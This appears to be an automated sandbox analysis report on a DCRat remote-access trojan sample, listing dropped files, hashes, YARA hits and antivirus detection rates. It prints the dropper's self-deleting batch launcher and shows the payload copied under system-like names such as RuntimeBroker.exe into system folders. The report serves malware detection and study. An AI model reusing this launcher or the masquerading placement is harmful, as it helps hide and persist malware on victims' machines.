                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (578), with no line terminators
                              Category:dropped
                              Size (bytes):578
                              Entropy (8bit):5.878655502068084
                              Encrypted:false
                              SSDEEP:12:ZXfLWXKlHP/vIS9jsRMSQaDRzn5tLUPc3sEb/hWcwjh4GGTJ:ZIsHIRrQa1z5tLz9/hcjiHTJ
                              MD5:2E200C0EA6ED7021327CBEE4DB4927AC
                              SHA1:258FDD3ECA1C01AF78260974791B30DBB043DB6F
                              SHA-256:6692C38BCEA07EF209920184AE92C04BF6E52CB7C440CE30A83065349CEC2701
                              SHA-512:69BE5274B3CE3A811CB59D7E3DF00EC7D50913F1F193BA6D96CBBBC14916FDC2F1AC3ECACCC1E23CE0CDA6E724AC2B03E479E995AD02F299CB3216AA53F7776F
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):291
                              Entropy (8bit):5.81117666909219
                              Encrypted:false
                              SSDEEP:6:Iwc5vUgS1WDKWLsk1oQmj/Dvy5+dcsF1Iw7Ps6N63bln:65GW+WLsGoRdhIub6rln
                              MD5:C511A5E07A4AF85A2A87807FEBB4025C
                              SHA1:2C32D54C0D3811395AB8813BCE4DC8C1AB06C3E4
                              SHA-256:DFAB062223D02BD3F2E79F7758D636F113ACA07F0CA9CB87CB63E2715E8A7FC7
                              SHA-512:CF94E134866D33827F2DFEB59F88D3FC5927DE5CBA5B73B9869A5876D67CEA97F1D7EEB59AA9507F333C3634222B569291232372F1E88E04AA8986B217F90869
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\RuntimeBroker.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Default\RuntimeBroker.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\Default\RuntimeBroker.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (508), with no line terminators
                              Category:dropped
                              Size (bytes):508
                              Entropy (8bit):5.865134715345217
                              Encrypted:false
                              SSDEEP:12:9wq5qKz7AaAut8G/I0JDBGX7enGCt2ArkUmYXxBd:9weZz7Kut82xTrkiXxj
                              MD5:5474CF40BEFCD497AB573147FD89405F
                              SHA1:5B87C068A2273E46F884BEF37C81B958FFA557F2
                              SHA-256:F5EBBC1CD6F22392C6E822EBA3B84126814C4A0C3C3A26DF4467FEC63204A551
                              SHA-512:BDAE942037FF1C9B6DC8E0708FF96539D7E26ED322BB3ACBF665FB4DCA5AAA3F386B9922E23AE6916EA4A29DFDE6195D9D5BF57FB1C979487E3660D2B355FDB6
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 79%
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\Public\Libraries\RuntimeBroker.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1740
                              Entropy (8bit):5.36827240602657
                              Encrypted:false
                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                              MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                              SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                              SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                              SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                              Malicious:true
                              Process:C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
                              Process:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
                              Process:C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):1281
                              Entropy (8bit):5.370111951859942
                              Encrypted:false
                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):25
                              Entropy (8bit):4.243856189774724
                              Encrypted:false
                              SSDEEP:3:hOHpocGu:QJB5
                              MD5:7037E45721B6495FE860E8DC26E27612
                              SHA1:888C35290F69ADA4B5FEFCD106FB0FC272458C77
                              SHA-256:BDA7DB386772809D23C72715279A3785326CE87FF541BA4759573892192CA74E
                              SHA-512:B83BE581664E2765F8478137AC77F5BC4304B048F6B5006406F5B1A51C6AE3095AA4AEF3F8C68805EF466DB2FE1B4B9565859B21D457E3727FBE086DC40CDDF4
                              Malicious:false
                              Preview:77CBr4XOYJTMytzDox48y8LOK
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):202
                              Entropy (8bit):5.228933567824266
                              Encrypted:false
                              SSDEEP:6:hITg3Nou11r+DE77hcejgvKOZG1wkn23ft1RiG:OTg9YDE79jgDfrRp
                              MD5:272CB590CDC2BFE6D906176FA2EE05A4
                              SHA1:10F1F7CD88AF417E6AA4167DCB58A19B1454DF1D
                              SHA-256:86697A47D6A288EBF6DBB4C9173FE474983F51E30C5C0E81AC8A4B6AF3EC60B6
                              SHA-512:5A4D2C9C17F1DA0539A8873B5DE1EE34982E668965CF72C3FCC885F203FCC373B400FD50CB90E92E109E96EF135A42141E1AF4C20DA625595688B1BE6AFDD59D
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZBWGzntvdU.bat"
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (914), with no line terminators
                              Category:dropped
                              Size (bytes):914
                              Entropy (8bit):5.894794459139507
                              Encrypted:false
                              SSDEEP:24:4ETe7fETXyfV4jZhIUJCjh5gIj4DKR3gn9j5:9TTTAG/a1j7wn99
                              MD5:B76181C0BE1CD9383832E248E80422ED
                              SHA1:C32647AA117CF94309475302224A9EFF6733E281
                              SHA-256:1A8E4EC9E18091BAF91C73AD0944E57029E89D3AF094FD5F4065EA15065201A8
                              SHA-512:2BE23FE96D15A15C765323F58B0FB6A62B69E03173D48BA742942288E78958F69E06E68D573026631525CF0B65D867B6B5F49B6B751B88246968C764E151FBBC
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):323072
                              Entropy (8bit):5.759825134174161
                              Encrypted:false
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              MD5:ED9312F79BD3E7F4BEB41E56EA82512E
                              SHA1:213D531F2CA1543ECC1AF3AD2B7FE56B4B027BFE
                              SHA-256:786B9891BC5CA12D44F2DF1A978F675693647EAED50DA66B92BDBD3C290BCA88
                              SHA-512:E057055CADB37DD8EE8F4C0308B19C8B19FA6274064C54B1927EC23DD80EEC2C952E1F35F54B8E4B60B7E128B23940FF13C460EE5CF85E20EEB5AA217FDAF4E3
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\Media\WinStore.App.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Media\WinStore.App.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\Media\WinStore.App.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 79%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................~.... ... ....@.. .......................`.......^....@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H.......H...............................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (590), with no line terminators
                              Category:dropped
                              Size (bytes):590
                              Entropy (8bit):5.877283291275858
                              Encrypted:false
                              SSDEEP:12:SdZRiBwDepP2ZzPg5c2tPpflr+kQTUKFS5NfUPI7aZrEVJ3e:Sdaf2ZzPg5PflrKcK/ZgXO
                              MD5:A974FD3BE183A3A8B1D11A1330C90EFD
                              SHA1:919E209AAA203F20C1AF8CF7FCAD3C87A0465C2D
                              SHA-256:CE537377ACF9A9AC9AC5029ABC15DF41147A873CCF189717047CC18C601E2790
                              SHA-512:B853F87786BEC5B9B4B371811039E9A9ACBCFA0EE61FFD679F0C46B2364FE292158072A709B7FCFFAA67C1A6E2D7DF3896D1B3B9B18CA10BA35346C0A54E1051
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (670), with no line terminators
                              Category:dropped
                              Size (bytes):670
                              Entropy (8bit):5.906598116528062
                              Encrypted:false
                              SSDEEP:12:0Q+hSN8NdU1a+l8L8Y+leTD2caTUffJzerOS/zSDg28p7yf1rpqRRXvmYlDM89I:0NDNdsI0cYU3lpz8p7yf1rpqRFmyM89I
                              MD5:03C3E11CA064B99EF485E090D8A33095
                              SHA1:262168D885AD6938B04A6AD0F45DB420AB7C82EA
                              SHA-256:09CA050F1ABCCA6E947DCB05345E3556DC69E5CD8445F0F022F8F3C885789CC5
                              SHA-512:CB7418A917AC9D999CF2D82CB7A59FF259BE6306D94AFEDEF5E30CAC402BB36EBDC623B39CE0C2D38543F17C879C9E16E8ED64BBD50B5E47828E51FB65796AF7
                              Malicious:false
                              Process:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              File Type:ASCII text, with very long lines (960), with no line terminators
                              Category:dropped
                              Size (bytes):960
                              Entropy (8bit):5.912156307346969
                              Encrypted:false
                              SSDEEP:24:AqcTABJnSEgO8daW+d94JhQDJ0ssij6+7V5:AVqoOKaWK+oDqssiW+7b
                              MD5:AEAA919B48E9C07A2CC5571EA4AA0B17
                              SHA1:4D42F079C049081E606D2484F91A862A02BE066F
                              SHA-256:4FF930AD21EC1F6189A5E87B9DC5CD28C86E96A4A95C2AEF5987FAE1F5879680
                              SHA-512:CA39A6D194709B415D698A318C513CD098E28FA08ECFBA77D1AA70F90839C6D6AF67AF2A0B9E724DBC259BAF098DFC7AD48262426B245EEAC7904037ACC0A5A6
                              Malicious:false
                              Process:C:\Windows\System32\w32tm.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):151
                              Entropy (8bit):4.8236554554921875
                              Encrypted:false
                              SSDEEP:3:VLV993J+miJWEoJ8FXA3MzrckdNvpsPLyXKNvj:Vx993DEUt3FkiPLy8
                              MD5:03B18B6423EEDD39B46A7DEA5886C42C
                              SHA1:FE70A8FB13DD1E6AEE9E6DF35AC793F248B9690E
                              SHA-256:A4734EA59A8C078771B33E271E1CD37AB12A98BFD9D522B0CD15433BD0BD58C7
                              SHA-512:8F78CC61FA488A077279946854B7264899D076653A5FD20504F3447F002F1C279CDF1B0E7E65177740E5550C0B0892E1EA473F08570827631FA70E21EF98537C
                              Malicious:false
                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 31/08/2024 06:07:39..06:07:39, error: 0x80072746.06:07:44, error: 0x80072746.
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):5.759825134174161
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                              File name:dmhu7oz5yP.exe
                              File size:323'072 bytes
                              MD5:ed9312f79bd3e7f4beb41e56ea82512e
                              SHA1:213d531f2ca1543ecc1af3ad2b7fe56b4b027bfe
                              SHA256:786b9891bc5ca12d44f2df1a978f675693647eaed50da66b92bdbd3c290bca88
                              SHA512:e057055cadb37dd8ee8f4c0308b19c8b19fa6274064c54b1927ec23dd80eec2c952e1f35f54b8e4b60b7e128b23940ff13c460ee5cf85e20eeb5aa217fdaf4e3
                              SSDEEP:6144:P54y2oo7KrA7bRCgxHV4casxgZ0BBxxqHsyQK4M0dxVbhaLr9u:P72N7J5FHVGZ0AQZRdx8Z
                              TLSH:27645A2833EC4B19F1BE6BB5D4B3515997B1F46AFA7EEB0E4D8150DA1826340DC00BA7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb..........".................~.... ... ....@.. .......................`.......^....@................................
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0x45057e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5052c | 0x4f | .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x218 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54000 | 0xc | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
